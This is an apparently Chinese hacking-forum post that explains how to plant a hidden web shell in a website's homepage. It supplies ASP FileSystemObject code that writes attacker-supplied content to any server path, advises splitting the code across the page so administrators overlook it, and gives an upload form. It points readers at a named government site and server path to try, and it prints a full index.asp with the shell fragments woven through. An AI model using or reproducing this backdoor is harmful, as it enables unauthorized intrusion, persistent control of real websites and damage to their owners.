插入式免杀后门 将后门放到对方主页里
信息来源:HOKY
昨天也不知怎就搞到中国域名网的权限了,搞了很久,有自动备份。
转入正题:
1.随便找他一个页面,然后把如下内容分开插入到它的主页了,注意一下上下文。内容(fso):
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
最好要分开插入!!
这样管理员也不容易发现。
2.
将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路径就好了。你要知道路径!!内容:
<form action=’#’ method=post>保存<input type=text name=syfdpath width=32 size=50><br>路径<br>内容:<textarea name=cyfddata cols=80 rows=10 width=32></textarea><input type=submit value=保存></form>
注:此方法为巩固后门使用!!!
有人说不行????
自己看看截图
大家可以把上内容的action改成"http://www.bjhi.gov.cn/web/biaozhun/index.asp"
路径添"E:\inetpub\bjhi\web\biaozhun\xxxx.asp"
试下
最后用"http://www.bjhi.gov.cn/web/biaozhun/xxxx.asp"访问看看!!
改后的index.asp:
<!--#include file="head.asp"-->
<!--#include file="../../conn/xxfw_opendb.asp"-->
<script language= "javascript">
function newpage(htmlurl) {
var newwin=window.open(htmlurl,"newWin","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=no,top=2,left=2,width=778,height=600");
newwin.focus();
return false;
}
</script>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="23" class="a" align="center">
<tr>
<td width="22"><img src="../biaozhun/images/a_r2_c1.jpg" width="22" height="23"></td>
<td width="13"><img src="../biaozhun/images/a_r2_c3.jpg" width="13" height="23"></td>
<td width="13"><img src="images/a_r2_c3.jpg" width="13" height="23"></td>
<td background="images/a_r2_c4.jpg"><font color="#006699"><a href="../xinxi/zxxx/index.asp"><font color="#006699">资讯信息</font></a><font color="#006699">
| <a href="../xinxi/ggxc/index.asp"><font color="#006699">广告宣传</font></a>
| <a href="../peixun/px.asp"><font color="#006699">网上培训</font></a> | <a href="index.asp"><font color="#006699">标准规范</font></a>
| <a href="../yjqk/index.asp"><font color="#006699">邮箱期刊</font></a> | <a href="../xinxi/jsfw/index.asp"><font color="#006699">技术服务</font></a>
| <a href="../xinxi/qysw/index.asp"><font color="#006699">企业上网</font></a>
| <a href="../xinxi/xihd/index.asp"><font color="#006699">信息互动</font></a>
|</font> </font></td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="23" align="center">
<tr bgcolor="CAF2FA">
<td width="589"><font size="2"> 你的位置:</font>>> <a href="../../soye/index.asp" class="a">综合主页</a>
>> <font size="2">标准规范</font></td>
<% on error resume next %>
<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<td width="170"> </td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td width="20" background="images/a_r4_c1.jpg"> <% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
</td>
<td width="758" background="images/a_r4_c1.jpg"><img src="images/biaozhun.jpg" width="144" height="44"></td>
</tr>
</table>
<table width="778" border="0" cellspacing="0" cellpadding="0" height="30" align="center">
<tr>
<td width="103" height="7">&nbs<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>p;</td>
<td width="575" height="7"> <% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %> <% set rs=server.createobject("adodb.recordset")
rs.open "select * from border",conn,1,1%><br><% err.clear %>
<form name="form1" method="post" action="result.asp">
<div align="center"><span class="a">选择类别:
<select name="select" class="select">
<option selected value="0">请选择类别</option>
<%count=rs.RecordCount
for i=1 to count
if rs("borderid")<>8 then%>
<option value="<%Response.Write (rs("borderid"))%>"><%Response.Write (rs("bordername"))%></option>
<%end if
rs.MoveNext
next
rs.Close%>
</select>
输入关键字
<input type="text" name="keys" class="input" size="20">
</span>
<input type="submit" name="Submit" value="查 询" style="height:20px;background-color:#f3f3f3;border:1 solid black" onMouseOver ="this.style.backgroundColor=’#cff6fb’" onMouseOut ="this.style.backgroundColor=’#ffffff’">
</div>
</form>
</td>
<td width="100" height="7"> </td>
</tr>
</table>
<div align="center">
<table width="535" border="0" cellspacing="0" cellpadding="0" height="25" class="a">
<tr>
<td height="25">
<table width="533" border="1" cellspacing="0" cellpadding="0" align="top" class="a" height="20" bordercolor="E7ECE6">
<%
border=""
color=1
number=15 ’默认值
auditer=0
articlefrom=""
set rs=server.createobject("adodb.recordset")
rs.open "select * from info where typeid=2 and bz_sh=1 order by date desc ",conn,1,1
if err.number <> 0 then
response.write "数据库出错"
else
if rs.bof and rs.eof then
rs.close
response.write "该专栏目前没有信息服务内容"
else
if request("page")="" then
curpage = 1
else
curpage = cint(request("page"))
end if
if request("num")="" then
num = 1
else
num = cint(request("num"))
end if
rs.pagesize=cint(number)
rs.absolutepage = curpage
thisnumcol=cstr(rs.recordcount)-num
prenum=cstr(rs.recordcount)-thisnumcol-15
for i = 1 to rs.pagesize
%>
<tr>
<!--<td width="17" bgcolor="EBEDEA" height="15">
<div align="center"><img src="images/09.jpg" width="9" height="9"></div>
</td>-->
<td width="8%" bgcolor="EBEDEA" height="15">
<div align="center"><%Response.Write (num)%></div>
</td>
<td width="75%" height="15" bgcolor="<%if color mod 2=0 then
response.write "#FFFFFF"
else
response.write "#CFF6FB"
end if %>"> <%=trim(rs("title"))%></td>
<td align="center" width="17%" height="15" bgcolor="<%if color mod 2=0 then
response.write "#FFFFFF"
else
response.write "#CFF6FB"
end if %>">
<a href="showinfo.asp?infoid=<%=rs("infoid")%>" onClick="return newpage(this.href);">查看详情</a></td>
</tr>
<% rs.movenext
num=num+1
color=color+1
if rs.eof then
i = i + 1
exit for
end if
next %></table><br><font size="2">
<% endnum=cstr(rs.recordcount)-(cstr(rs.recordcount) mod 15)+1
response.write "<div align=center>"
response.write "第<font color=red>" + cstr(curpage) + "</font>页/总<font color=red>" + cstr(rs.pagecount) + "</font>页 "
response.write "本页<font color=red>" + cstr(i-1) + "</font>条/总<font color=red>" + cstr(rs.recordcount) + "</font>条 "
if curpage = 1 then
response.write "首页 前页 "
else
response.write "<a href=’index.asp?page=1&num=1’>首页</a> <a href=’index.asp?page=" & cstr(curpage-1) & "&num="&prenum&"’>前页</a> "
end if
if curpage = rs.pagecount then
response.write "后页 末页"
else
response.write "<a href=’index.asp?page=" + cstr(curpage+1) + "&num="&num&"’>后页</a> <a href=’index.asp?page=" + cstr(rs.pagecount) + "&num="&endnum&"’>末页</a>"
end if
end If
end if
’?typeid=" & cstr(request("typeid")) & "&borderid=" & cstr(request("borderid")) & "& page=1’>
response.write "<div align=center><hr size=0 width=’85%’>"%></font>
</table>
</div>
<!--#include file="foot.asp"-->
<!--#include file="../../conn/closedb.asp"-->
设为首页 
加入收藏 
联系我们 繁體中文 
